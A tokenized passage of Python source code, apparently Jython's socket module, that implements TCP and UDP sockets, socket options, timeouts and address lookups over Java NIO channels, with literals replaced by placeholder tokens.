'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:error>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> def _constant_to_name ( const_value ) : <EOL> sock_module = sys . modules [ '<STR_LIT>' ] <EOL> try : <EOL> for name in dir ( sock_module ) : <EOL> if getattr ( sock_module , name ) is const_value : <EOL> return name <EOL> return "<STR_LIT>" <EOL> finally : <EOL> sock_module = None <EOL> class _nio_impl : <EOL> timeout = None <EOL> mode = MODE_BLOCKING <EOL> def getpeername ( self ) : <EOL> return ( self . jsocket . getInetAddress ( ) . getHostAddress ( ) , self . jsocket . getPort ( ) ) <EOL> def config ( self , mode , timeout ) : <EOL> self . mode = mode <EOL> if self . mode == MODE_BLOCKING : <EOL> self . jchannel . configureBlocking ( <NUM_LIT:1> ) <EOL> if self . mode == MODE_NONBLOCKING : <EOL> self . jchannel . configureBlocking ( <NUM_LIT:0> ) <EOL> if self . mode == MODE_TIMEOUT : <EOL> self . jchannel . configureBlocking ( <NUM_LIT:1> ) <EOL> self . _timeout_millis = int ( timeout * <NUM_LIT:1000> ) <EOL> self . jsocket . setSoTimeout ( self . _timeout_millis ) <EOL> def getsockopt ( self , level , option ) : <EOL> if self . options . has_key ( ( level , option ) ) : <EOL> result = getattr ( self . jsocket , "<STR_LIT>" % self . options [ ( level , option ) ] ) ( ) <EOL> if option == SO_LINGER : <EOL> if result == - <NUM_LIT:1> : <EOL> enabled , linger_time = <NUM_LIT:0> , <NUM_LIT:0> <EOL> else : <EOL> enabled , linger_time = <NUM_LIT:1> , result <EOL> return struct . pack ( '<STR_LIT>' , enabled , linger_time ) <EOL> return result <EOL> else : <EOL> raise error ( errno . ENOPROTOOPT , "<STR_LIT>" % ( _constant_to_name ( option ) , _constant_to_name ( level ) , str ( self . 
jsocket ) ) ) <EOL> def setsockopt ( self , level , option , value ) : <EOL> if self . options . has_key ( ( level , option ) ) : <EOL> if option == SO_LINGER : <EOL> values = struct . unpack ( '<STR_LIT>' , value ) <EOL> self . jsocket . setSoLinger ( * values ) <EOL> else : <EOL> getattr ( self . jsocket , "<STR_LIT>" % self . options [ ( level , option ) ] ) ( value ) <EOL> else : <EOL> raise error ( errno . ENOPROTOOPT , "<STR_LIT>" % ( _constant_to_name ( option ) , _constant_to_name ( level ) , str ( self . jsocket ) ) ) <EOL> def close ( self ) : <EOL> self . jsocket . close ( ) <EOL> def getchannel ( self ) : <EOL> return self . jchannel <EOL> def fileno ( self ) : <EOL> return self . socketio <EOL> class _client_socket_impl ( _nio_impl ) : <EOL> options = { <EOL> ( SOL_SOCKET , SO_KEEPALIVE ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_LINGER ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_OOBINLINE ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_RCVBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_REUSEADDR ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_SNDBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_TIMEOUT ) : '<STR_LIT>' , <EOL> ( IPPROTO_TCP , TCP_NODELAY ) : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self , socket = None ) : <EOL> if socket : <EOL> self . jchannel = socket . getChannel ( ) <EOL> self . host = socket . getInetAddress ( ) . getHostAddress ( ) <EOL> self . port = socket . getPort ( ) <EOL> else : <EOL> self . jchannel = java . nio . channels . SocketChannel . open ( ) <EOL> self . host = None <EOL> self . port = None <EOL> self . jsocket = self . jchannel . socket ( ) <EOL> self . socketio = org . python . core . io . SocketIO ( self . jchannel , '<STR_LIT>' ) <EOL> def bind ( self , host , port , reuse_addr ) : <EOL> self . jsocket . setReuseAddress ( reuse_addr ) <EOL> self . jsocket . bind ( java . net . InetSocketAddress ( host , port ) ) <EOL> def connect ( self , host , port ) : <EOL> self . host = host <EOL> self . port = port <EOL> if self . 
mode == MODE_TIMEOUT : <EOL> self . jsocket . connect ( java . net . InetSocketAddress ( self . host , self . port ) , self . _timeout_millis ) <EOL> else : <EOL> self . jchannel . connect ( java . net . InetSocketAddress ( self . host , self . port ) ) <EOL> def finish_connect ( self ) : <EOL> return self . jchannel . finishConnect ( ) <EOL> def _do_read_net ( self , buf ) : <EOL> return self . jsocket . getInputStream ( ) . read ( buf ) <EOL> def _do_read_nio ( self , buf ) : <EOL> bytebuf = java . nio . ByteBuffer . wrap ( buf ) <EOL> count = self . jchannel . read ( bytebuf ) <EOL> return count <EOL> def _do_write_net ( self , buf ) : <EOL> self . jsocket . getOutputStream ( ) . write ( buf ) <EOL> return len ( buf ) <EOL> def _do_write_nio ( self , buf ) : <EOL> bytebuf = java . nio . ByteBuffer . wrap ( buf ) <EOL> count = self . jchannel . write ( bytebuf ) <EOL> return count <EOL> def read ( self , buf ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_read_net ( buf ) <EOL> else : <EOL> return self . _do_read_nio ( buf ) <EOL> def write ( self , buf ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_write_net ( buf ) <EOL> else : <EOL> return self . _do_write_nio ( buf ) <EOL> def shutdown ( self , how ) : <EOL> if how in ( SHUT_RD , SHUT_RDWR ) : <EOL> self . jsocket . shutdownInput ( ) <EOL> if how in ( SHUT_WR , SHUT_RDWR ) : <EOL> self . jsocket . shutdownOutput ( ) <EOL> class _server_socket_impl ( _nio_impl ) : <EOL> options = { <EOL> ( SOL_SOCKET , SO_RCVBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_REUSEADDR ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_TIMEOUT ) : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self , host , port , backlog , reuse_addr ) : <EOL> self . jchannel = java . nio . channels . ServerSocketChannel . open ( ) <EOL> self . jsocket = self . jchannel . socket ( ) <EOL> if host : <EOL> bindaddr = java . net . InetSocketAddress ( host , port ) <EOL> else : <EOL> bindaddr = java . net . 
InetSocketAddress ( port ) <EOL> self . jsocket . setReuseAddress ( reuse_addr ) <EOL> self . jsocket . bind ( bindaddr , backlog ) <EOL> self . socketio = org . python . core . io . ServerSocketIO ( self . jchannel , '<STR_LIT>' ) <EOL> def accept ( self ) : <EOL> if self . mode in ( MODE_BLOCKING , MODE_NONBLOCKING ) : <EOL> new_cli_chan = self . jchannel . accept ( ) <EOL> if new_cli_chan != None : <EOL> return _client_socket_impl ( new_cli_chan . socket ( ) ) <EOL> else : <EOL> return None <EOL> else : <EOL> new_cli_sock = self . jsocket . accept ( ) <EOL> return _client_socket_impl ( new_cli_sock ) <EOL> def shutdown ( self , how ) : <EOL> pass <EOL> class _datagram_socket_impl ( _nio_impl ) : <EOL> options = { <EOL> ( SOL_SOCKET , SO_BROADCAST ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_RCVBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_REUSEADDR ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_SNDBUF ) : '<STR_LIT>' , <EOL> ( SOL_SOCKET , SO_TIMEOUT ) : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self , port = None , address = None , reuse_addr = <NUM_LIT:0> ) : <EOL> self . jchannel = java . nio . channels . DatagramChannel . open ( ) <EOL> self . jsocket = self . jchannel . socket ( ) <EOL> if port is not None : <EOL> if address is not None : <EOL> local_address = java . net . InetSocketAddress ( address , port ) <EOL> else : <EOL> local_address = java . net . InetSocketAddress ( port ) <EOL> self . jsocket . setReuseAddress ( reuse_addr ) <EOL> self . jsocket . bind ( local_address ) <EOL> self . socketio = org . python . core . io . DatagramSocketIO ( self . jchannel , '<STR_LIT>' ) <EOL> def connect ( self , host , port ) : <EOL> self . jchannel . connect ( java . net . InetSocketAddress ( host , port ) ) <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> self . jchannel . disconnect ( ) <EOL> def shutdown ( self , how ) : <EOL> pass <EOL> def _do_send_net ( self , byte_array , socket_address , flags ) : <EOL> num_bytes = len ( byte_array ) <EOL> if self . 
jsocket . isConnected ( ) and socket_address is None : <EOL> packet = java . net . DatagramPacket ( byte_array , num_bytes ) <EOL> else : <EOL> packet = java . net . DatagramPacket ( byte_array , num_bytes , socket_address ) <EOL> self . jsocket . send ( packet ) <EOL> return num_bytes <EOL> def _do_send_nio ( self , byte_array , socket_address , flags ) : <EOL> byte_buf = java . nio . ByteBuffer . wrap ( byte_array ) <EOL> if self . jchannel . isConnected ( ) and socket_address is None : <EOL> bytes_sent = self . jchannel . write ( byte_buf ) <EOL> else : <EOL> bytes_sent = self . jchannel . send ( byte_buf , socket_address ) <EOL> return bytes_sent <EOL> def sendto ( self , byte_array , host , port , flags ) : <EOL> socket_address = java . net . InetSocketAddress ( host , port ) <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_send_net ( byte_array , socket_address , flags ) <EOL> else : <EOL> return self . _do_send_nio ( byte_array , socket_address , flags ) <EOL> def send ( self , byte_array , flags ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_send_net ( byte_array , None , flags ) <EOL> else : <EOL> return self . _do_send_nio ( byte_array , None , flags ) <EOL> def _do_receive_net ( self , return_source_address , num_bytes , flags ) : <EOL> byte_array = jarray . zeros ( num_bytes , '<STR_LIT:b>' ) <EOL> packet = java . net . DatagramPacket ( byte_array , num_bytes ) <EOL> self . jsocket . receive ( packet ) <EOL> bytes_rcvd = packet . getLength ( ) <EOL> if bytes_rcvd < num_bytes : <EOL> byte_array = byte_array [ : bytes_rcvd ] <EOL> return_data = byte_array . tostring ( ) <EOL> if return_source_address : <EOL> host = None <EOL> if packet . getAddress ( ) : <EOL> host = packet . getAddress ( ) . getHostAddress ( ) <EOL> port = packet . 
getPort ( ) <EOL> return return_data , ( host , port ) <EOL> else : <EOL> return return_data <EOL> def _do_receive_nio ( self , return_source_address , num_bytes , flags ) : <EOL> byte_array = jarray . zeros ( num_bytes , '<STR_LIT:b>' ) <EOL> byte_buf = java . nio . ByteBuffer . wrap ( byte_array ) <EOL> source_address = self . jchannel . receive ( byte_buf ) <EOL> if source_address is None and not self . jchannel . isBlocking ( ) : <EOL> raise would_block_error ( ) <EOL> byte_buf . flip ( ) ; bytes_read = byte_buf . remaining ( ) <EOL> if bytes_read < num_bytes : <EOL> byte_array = byte_array [ : bytes_read ] <EOL> return_data = byte_array . tostring ( ) <EOL> if return_source_address : <EOL> return return_data , ( source_address . getAddress ( ) . getHostAddress ( ) , source_address . getPort ( ) ) <EOL> else : <EOL> return return_data <EOL> def recvfrom ( self , num_bytes , flags ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_receive_net ( <NUM_LIT:1> , num_bytes , flags ) <EOL> else : <EOL> return self . _do_receive_nio ( <NUM_LIT:1> , num_bytes , flags ) <EOL> def recv ( self , num_bytes , flags ) : <EOL> if self . mode == MODE_TIMEOUT : <EOL> return self . _do_receive_net ( <NUM_LIT:0> , num_bytes , flags ) <EOL> else : <EOL> return self . _do_receive_nio ( <NUM_LIT:0> , num_bytes , flags ) <EOL> has_ipv6 = False <EOL> def _gethostbyaddr ( name ) : <EOL> addresses = java . net . InetAddress . getAllByName ( gethostbyname ( name ) ) <EOL> names = [ ] <EOL> addrs = [ ] <EOL> for addr in addresses : <EOL> names . append ( asPyString ( addr . getHostName ( ) ) ) <EOL> addrs . append ( asPyString ( addr . getHostAddress ( ) ) ) <EOL> return ( names , addrs ) <EOL> def getfqdn ( name = None ) : <EOL> """<STR_LIT>""" <EOL> if not name : <EOL> name = gethostname ( ) <EOL> names , addrs = _gethostbyaddr ( name ) <EOL> for a in names : <EOL> if a . 
find ( "<STR_LIT:.>" ) >= <NUM_LIT:0> : <EOL> return a <EOL> return name <EOL> def gethostname ( ) : <EOL> try : <EOL> return asPyString ( java . net . InetAddress . getLocalHost ( ) . getHostName ( ) ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def gethostbyname ( name ) : <EOL> try : <EOL> return asPyString ( java . net . InetAddress . getByName ( name ) . getHostAddress ( ) ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def gethostbyaddr ( name ) : <EOL> names , addrs = _gethostbyaddr ( name ) <EOL> return ( names [ <NUM_LIT:0> ] , names , addrs ) <EOL> def getservbyname ( servicename , protocolname = None ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def getservbyport ( port , protocolname = None ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def getprotobyname ( protocolname = None ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def _realsocket ( family = AF_INET , type = SOCK_STREAM , protocol = <NUM_LIT:0> ) : <EOL> assert family == AF_INET , "<STR_LIT>" <EOL> assert type in ( SOCK_DGRAM , SOCK_STREAM ) , "<STR_LIT>" <EOL> if type == SOCK_STREAM : <EOL> if protocol != <NUM_LIT:0> : <EOL> assert protocol == IPPROTO_TCP , "<STR_LIT>" <EOL> return _tcpsocket ( ) <EOL> else : <EOL> if protocol != <NUM_LIT:0> : <EOL> assert protocol == IPPROTO_UDP , "<STR_LIT>" <EOL> return _udpsocket ( ) <EOL> def getaddrinfo ( host , port , family = AF_INET , socktype = None , proto = <NUM_LIT:0> , flags = None ) : <EOL> try : <EOL> if not family in [ AF_INET , AF_INET6 , AF_UNSPEC ] : <EOL> raise gaierror ( errno . EIO , '<STR_LIT>' ) <EOL> filter_fns = [ ] <EOL> filter_fns . append ( { <EOL> AF_INET : lambda x : isinstance ( x , java . net . Inet4Address ) , <EOL> AF_INET6 : lambda x : isinstance ( x , java . net . Inet6Address ) , <EOL> AF_UNSPEC : lambda x : isinstance ( x , java . net . 
InetAddress ) , <EOL> } [ family ] ) <EOL> if host == "<STR_LIT>" : <EOL> host = java . net . InetAddress . getLocalHost ( ) . getHostName ( ) <EOL> passive_mode = flags is not None and flags & AI_PASSIVE <EOL> canonname_mode = flags is not None and flags & AI_CANONNAME <EOL> results = [ ] <EOL> for a in java . net . InetAddress . getAllByName ( host ) : <EOL> if len ( [ f for f in filter_fns if f ( a ) ] ) : <EOL> family = { java . net . Inet4Address : AF_INET , java . net . Inet6Address : AF_INET6 } [ a . getClass ( ) ] <EOL> if passive_mode and not canonname_mode : <EOL> canonname = "<STR_LIT>" <EOL> else : <EOL> canonname = asPyString ( a . getCanonicalHostName ( ) ) <EOL> if host is None and passive_mode and not canonname_mode : <EOL> sockname = INADDR_ANY <EOL> else : <EOL> sockname = asPyString ( a . getHostAddress ( ) ) <EOL> results . append ( ( family , socktype , proto , canonname , ( sockname , port ) ) ) <EOL> return results <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getnameinfo ( sock_addr , flags ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def getdefaulttimeout ( ) : <EOL> return _defaulttimeout <EOL> def _calctimeoutvalue ( value ) : <EOL> if value is None : <EOL> return None <EOL> try : <EOL> floatvalue = float ( value ) <EOL> except : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if floatvalue < <NUM_LIT:0.0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if floatvalue < <NUM_LIT> : <EOL> return <NUM_LIT:0.0> <EOL> return floatvalue <EOL> def setdefaulttimeout ( timeout ) : <EOL> global _defaulttimeout <EOL> try : <EOL> _defaulttimeout = _calctimeoutvalue ( timeout ) <EOL> finally : <EOL> _nonblocking_api_mixin . timeout = _defaulttimeout <EOL> def htons ( x ) : return x <EOL> def htonl ( x ) : return x <EOL> def ntohs ( x ) : return x <EOL> def ntohl ( x ) : return x <EOL> def inet_pton ( family , ip_string ) : <EOL> try : <EOL> ia = java . net . InetAddress . 
getByName ( ip_string ) <EOL> bytes = [ ] <EOL> for byte in ia . getAddress ( ) : <EOL> if byte < <NUM_LIT:0> : <EOL> bytes . append ( byte + <NUM_LIT> ) <EOL> else : <EOL> bytes . append ( byte ) <EOL> return "<STR_LIT>" . join ( [ chr ( byte ) for byte in bytes ] ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def inet_ntop ( family , packed_ip ) : <EOL> try : <EOL> jByteArray = jarray . array ( packed_ip , '<STR_LIT:b>' ) <EOL> ia = java . net . InetAddress . getByAddress ( jByteArray ) <EOL> return ia . getHostAddress ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def inet_aton ( ip_string ) : <EOL> return inet_pton ( AF_INET , ip_string ) <EOL> def inet_ntoa ( packed_ip ) : <EOL> return inet_ntop ( AF_INET , packed_ip ) <EOL> class _nonblocking_api_mixin : <EOL> mode = MODE_BLOCKING <EOL> reference_count = <NUM_LIT:0> <EOL> close_lock = threading . Lock ( ) <EOL> def __init__ ( self ) : <EOL> self . timeout = _defaulttimeout <EOL> if self . timeout is not None : <EOL> self . mode = MODE_TIMEOUT <EOL> self . pending_options = { <EOL> ( SOL_SOCKET , SO_REUSEADDR ) : <NUM_LIT:0> , <EOL> } <EOL> def gettimeout ( self ) : <EOL> return self . timeout <EOL> def settimeout ( self , timeout ) : <EOL> self . timeout = _calctimeoutvalue ( timeout ) <EOL> if self . timeout is None : <EOL> self . mode = MODE_BLOCKING <EOL> elif self . timeout < <NUM_LIT> : <EOL> self . mode = MODE_NONBLOCKING <EOL> else : <EOL> self . mode = MODE_TIMEOUT <EOL> self . _config ( ) <EOL> def setblocking ( self , flag ) : <EOL> if flag : <EOL> self . mode = MODE_BLOCKING <EOL> self . timeout = None <EOL> else : <EOL> self . mode = MODE_NONBLOCKING <EOL> self . timeout = <NUM_LIT:0.0> <EOL> self . _config ( ) <EOL> def getblocking ( self ) : <EOL> return self . mode == MODE_BLOCKING <EOL> def setsockopt ( self , level , optname , value ) : <EOL> try : <EOL> if self . sock_impl : <EOL> self . sock_impl . 
setsockopt ( level , optname , value ) <EOL> else : <EOL> self . pending_options [ ( level , optname ) ] = value <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getsockopt ( self , level , optname ) : <EOL> try : <EOL> if self . sock_impl : <EOL> return self . sock_impl . getsockopt ( level , optname ) <EOL> else : <EOL> return self . pending_options . get ( ( level , optname ) , None ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def shutdown ( self , how ) : <EOL> assert how in ( SHUT_RD , SHUT_WR , SHUT_RDWR ) <EOL> if not self . sock_impl : <EOL> raise error ( errno . ENOTCONN , "<STR_LIT>" ) <EOL> try : <EOL> self . sock_impl . shutdown ( how ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def close ( self ) : <EOL> try : <EOL> if self . sock_impl : <EOL> self . sock_impl . close ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _config ( self ) : <EOL> assert self . mode in _permitted_modes <EOL> if self . sock_impl : <EOL> self . sock_impl . config ( self . mode , self . timeout ) <EOL> for level , optname in self . pending_options . keys ( ) : <EOL> if optname != SO_REUSEADDR : <EOL> self . sock_impl . setsockopt ( level , optname , self . pending_options [ ( level , optname ) ] ) <EOL> def getchannel ( self ) : <EOL> if not self . sock_impl : <EOL> return None <EOL> return self . sock_impl . getchannel ( ) <EOL> def fileno ( self ) : <EOL> if not self . sock_impl : <EOL> return None <EOL> return self . sock_impl . fileno ( ) <EOL> def _get_jsocket ( self ) : <EOL> return self . sock_impl . 
jsocket <EOL> def _unpack_address_tuple ( address_tuple ) : <EOL> error_message = "<STR_LIT>" <EOL> if not isinstance ( address_tuple , tuple ) or not isinstance ( address_tuple [ <NUM_LIT:0> ] , basestring ) or not isinstance ( address_tuple [ <NUM_LIT:1> ] , ( int , long ) ) : <EOL> raise TypeError ( error_message ) <EOL> hostname = address_tuple [ <NUM_LIT:0> ] <EOL> if isinstance ( hostname , unicode ) : <EOL> hostname = hostname . encode ( ) <EOL> hostname = hostname . strip ( ) <EOL> return hostname , address_tuple [ <NUM_LIT:1> ] <EOL> class _tcpsocket ( _nonblocking_api_mixin ) : <EOL> sock_impl = None <EOL> istream = None <EOL> ostream = None <EOL> local_addr = None <EOL> server = <NUM_LIT:0> <EOL> def __init__ ( self ) : <EOL> _nonblocking_api_mixin . __init__ ( self ) <EOL> def bind ( self , addr ) : <EOL> assert not self . sock_impl <EOL> assert not self . local_addr <EOL> _unpack_address_tuple ( addr ) <EOL> self . local_addr = addr <EOL> def listen ( self , backlog ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> assert not self . sock_impl <EOL> self . server = <NUM_LIT:1> <EOL> if self . local_addr : <EOL> host , port = _unpack_address_tuple ( self . local_addr ) <EOL> else : <EOL> host , port = "<STR_LIT>" , <NUM_LIT:0> <EOL> self . sock_impl = _server_socket_impl ( host , port , backlog , self . pending_options [ ( SOL_SOCKET , SO_REUSEADDR ) ] ) <EOL> self . _config ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def accept ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> if not self . sock_impl : <EOL> self . listen ( ) <EOL> assert self . server <EOL> new_sock = self . sock_impl . accept ( ) <EOL> if not new_sock : <EOL> raise would_block_error ( ) <EOL> cliconn = _tcpsocket ( ) <EOL> cliconn . pending_options [ ( SOL_SOCKET , SO_REUSEADDR ) ] = new_sock . jsocket . getReuseAddress ( ) <EOL> cliconn . sock_impl = new_sock <EOL> cliconn . _setup ( ) <EOL> return cliconn , new_sock . 
getpeername ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _get_host_port ( self , addr ) : <EOL> host , port = _unpack_address_tuple ( addr ) <EOL> if host == "<STR_LIT>" : <EOL> host = java . net . InetAddress . getLocalHost ( ) <EOL> return host , port <EOL> def _do_connect ( self , addr ) : <EOL> try : <EOL> assert not self . sock_impl <EOL> host , port = self . _get_host_port ( addr ) <EOL> self . sock_impl = _client_socket_impl ( ) <EOL> if self . local_addr : <EOL> bind_host , bind_port = _unpack_address_tuple ( self . local_addr ) <EOL> self . sock_impl . bind ( bind_host , bind_port , self . pending_options [ ( SOL_SOCKET , SO_REUSEADDR ) ] ) <EOL> self . _config ( ) <EOL> self . sock_impl . connect ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def connect ( self , addr ) : <EOL> "<STR_LIT>" <EOL> self . _do_connect ( addr ) <EOL> self . _setup ( ) <EOL> def connect_ex ( self , addr ) : <EOL> "<STR_LIT>" <EOL> if not self . sock_impl : <EOL> self . _do_connect ( addr ) <EOL> if self . sock_impl . finish_connect ( ) : <EOL> self . _setup ( ) <EOL> if self . mode == MODE_NONBLOCKING : <EOL> return errno . EISCONN <EOL> return <NUM_LIT:0> <EOL> return errno . EINPROGRESS <EOL> def _setup ( self ) : <EOL> if self . mode != MODE_NONBLOCKING : <EOL> self . istream = self . sock_impl . jsocket . getInputStream ( ) <EOL> self . ostream = self . sock_impl . jsocket . getOutputStream ( ) <EOL> def recv ( self , n ) : <EOL> try : <EOL> if not self . sock_impl : raise error ( errno . ENOTCONN , '<STR_LIT>' ) <EOL> if self . sock_impl . jchannel . isConnectionPending ( ) : <EOL> self . sock_impl . jchannel . finishConnect ( ) <EOL> data = jarray . zeros ( n , '<STR_LIT:b>' ) <EOL> m = self . sock_impl . read ( data ) <EOL> if m == - <NUM_LIT:1> : <EOL> return "<STR_LIT>" <EOL> elif m <= <NUM_LIT:0> : <EOL> if self . 
mode == MODE_NONBLOCKING : <EOL> raise would_block_error ( ) <EOL> return "<STR_LIT>" <EOL> if m < n : <EOL> data = data [ : m ] <EOL> return data . tostring ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def recvfrom ( self , n ) : <EOL> return self . recv ( n ) , None <EOL> def send ( self , s ) : <EOL> try : <EOL> if not self . sock_impl : raise error ( errno . ENOTCONN , '<STR_LIT>' ) <EOL> if self . sock_impl . jchannel . isConnectionPending ( ) : <EOL> self . sock_impl . jchannel . finishConnect ( ) <EOL> numwritten = self . sock_impl . write ( s ) <EOL> if numwritten == <NUM_LIT:0> and self . mode == MODE_NONBLOCKING : <EOL> raise would_block_error ( ) <EOL> return numwritten <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> sendall = send <EOL> def getsockname ( self ) : <EOL> try : <EOL> if not self . sock_impl : <EOL> host , port = self . local_addr or ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> host = java . net . InetAddress . getByName ( host ) . getHostAddress ( ) <EOL> else : <EOL> if self . server : <EOL> host = self . sock_impl . jsocket . getInetAddress ( ) . getHostAddress ( ) <EOL> else : <EOL> host = self . sock_impl . jsocket . getLocalAddress ( ) . getHostAddress ( ) <EOL> port = self . sock_impl . jsocket . getLocalPort ( ) <EOL> return ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getpeername ( self ) : <EOL> try : <EOL> assert self . sock_impl <EOL> assert not self . server <EOL> host = self . sock_impl . jsocket . getInetAddress ( ) . getHostAddress ( ) <EOL> port = self . sock_impl . jsocket . getPort ( ) <EOL> return ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def close ( self ) : <EOL> try : <EOL> if self . istream : <EOL> self . istream . close ( ) <EOL> if self . ostream : <EOL> self . ostream . close ( ) <EOL> if self . sock_impl : <EOL> self . 
sock_impl . close ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> class _udpsocket ( _nonblocking_api_mixin ) : <EOL> sock_impl = None <EOL> addr = None <EOL> def __init__ ( self ) : <EOL> _nonblocking_api_mixin . __init__ ( self ) <EOL> def bind ( self , addr ) : <EOL> try : <EOL> assert not self . sock_impl <EOL> host , port = _unpack_address_tuple ( addr ) <EOL> if host == "<STR_LIT>" : <EOL> host = INADDR_ANY <EOL> host_address = java . net . InetAddress . getByName ( host ) <EOL> self . sock_impl = _datagram_socket_impl ( port , host_address , self . pending_options [ ( SOL_SOCKET , SO_REUSEADDR ) ] ) <EOL> self . _config ( ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def _do_connect ( self , addr ) : <EOL> try : <EOL> host , port = _unpack_address_tuple ( addr ) <EOL> assert not self . addr <EOL> self . addr = addr <EOL> if not self . sock_impl : <EOL> self . sock_impl = _datagram_socket_impl ( ) <EOL> self . _config ( ) <EOL> self . sock_impl . connect ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def connect ( self , addr ) : <EOL> self . _do_connect ( addr ) <EOL> def connect_ex ( self , addr ) : <EOL> if not self . sock_impl : <EOL> self . _do_connect ( addr ) <EOL> return <NUM_LIT:0> <EOL> def sendto ( self , data , p1 , p2 = None ) : <EOL> try : <EOL> if not p2 : <EOL> flags , addr = <NUM_LIT:0> , p1 <EOL> else : <EOL> flags , addr = <NUM_LIT:0> , p2 <EOL> if not self . sock_impl : <EOL> self . sock_impl = _datagram_socket_impl ( ) <EOL> self . _config ( ) <EOL> host , port = _unpack_address_tuple ( addr ) <EOL> if host == "<STR_LIT>" : <EOL> host = INADDR_BROADCAST <EOL> byte_array = java . lang . String ( data ) . getBytes ( '<STR_LIT>' ) <EOL> result = self . sock_impl . sendto ( byte_array , host , port , flags ) <EOL> return result <EOL> except java . lang . 
Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def send ( self , data , flags = None ) : <EOL> if not self . addr : raise error ( errno . ENOTCONN , "<STR_LIT>" ) <EOL> byte_array = java . lang . String ( data ) . getBytes ( '<STR_LIT>' ) <EOL> return self . sock_impl . send ( byte_array , flags ) <EOL> def recvfrom ( self , num_bytes , flags = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if not self . sock_impl : <EOL> self . sock_impl = _datagram_socket_impl ( ) <EOL> self . _config ( ) <EOL> return self . sock_impl . recvfrom ( num_bytes , flags ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def recv ( self , num_bytes , flags = None ) : <EOL> if not self . sock_impl : raise error ( errno . ENOTCONN , "<STR_LIT>" ) <EOL> try : <EOL> return self . sock_impl . recv ( num_bytes , flags ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getsockname ( self ) : <EOL> try : <EOL> assert self . sock_impl <EOL> host = self . sock_impl . jsocket . getLocalAddress ( ) . getHostAddress ( ) <EOL> port = self . sock_impl . jsocket . getLocalPort ( ) <EOL> return ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def getpeername ( self ) : <EOL> try : <EOL> assert self . sock <EOL> host = self . sock_impl . jsocket . getInetAddress ( ) . getHostAddress ( ) <EOL> port = self . sock_impl . jsocket . getPort ( ) <EOL> return ( host , port ) <EOL> except java . lang . Exception , jlx : <EOL> raise _map_exception ( jlx ) <EOL> def __del__ ( self ) : <EOL> self . 
